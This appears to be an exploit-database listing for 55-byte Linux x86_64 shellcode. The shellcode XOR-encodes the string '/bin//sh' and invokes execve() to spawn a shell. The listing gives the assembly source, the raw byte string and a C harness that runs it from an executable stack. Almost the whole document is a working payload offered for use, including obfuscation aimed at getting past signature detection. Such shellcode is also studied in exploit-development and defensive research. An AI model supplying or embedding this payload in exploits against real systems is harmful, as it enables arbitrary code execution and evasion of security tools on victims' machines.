Share
## https://sploitus.com/exploit?id=1337DAY-ID-39134
# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]

# Shellcode Author: Alexys (0x177git)

# Tested on: Linux (x86_64)

# Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh)) 

# Original code: https://github.com/0x177git/xor-encrypted-execve-sh

---- Assembly code ----

  section .text

  global _start
 
_start:
  xor eax, eax
  xor edx, edx ; clear rdx (argv on execve() protoype)
  mov qword [rsp-32], 0x7466684b ; 
  mov qword [rsp-28],0x60650b1d  ; encrypted(/bin//sh) 0x60,  0x65,  0xb,  0x1d,  0x74,  0x66,  0x68,  0x4b 
  xor qword [rsp-32], 0x1a0f0a64
  xor qword [rsp-28], 0x08162432  ; passwd 0x8, 0x16, 0x24, 0x32, 0x1a, 0xf, 0xa, 0x64 
  lea rdi, [rsp-32]
  push rax ; end of string 
  push rdi ; send string to stack 
  mov rsi, rsp ; send address of RSP to rsi  ->  (arg on linux syscall architecture convection) || execve(rsi, rdx)
 
  ; call execve()
 mov al, 0x3b

  syscall 

    - - - shellcode execution using stack in c (gcc -z execstack  shellcode.c -o shellcode )  - - - - 


 /* 
"\x48\x31\xc0\x48\x31\xd2\x48\xc7\x44\x24\xe0\x4b\x68\x66\x74\x48\xc7\x44\x24\xe4\x1d\x0b\x65\x60\x48\x81\x74\x24\xe0\x64\x0a\x0f\x1a\x48\x81\x74\x24\xe4\x32\x24\x16\x08\x48\x8d\x7c\x24\xe0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

*/

void main ()
{
  const char  shellcode[] = "\x48\x31\xc0\x48\x31\xd2\x48\xc7\x44\x24\xe0\x4b\x68\x66\x74\x48\xc7\x44\x24\xe4\x1d\x0b\x65\x60\x48\x81\x74\x24\xe0\x64\x0a\x0f\x1a\x48\x81\x74\x24\xe4\x32\x24\x16\x08\x48\x8d\x7c\x24\xe0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
    void(*f)() = (void(*)()) shellcode;
     f();
}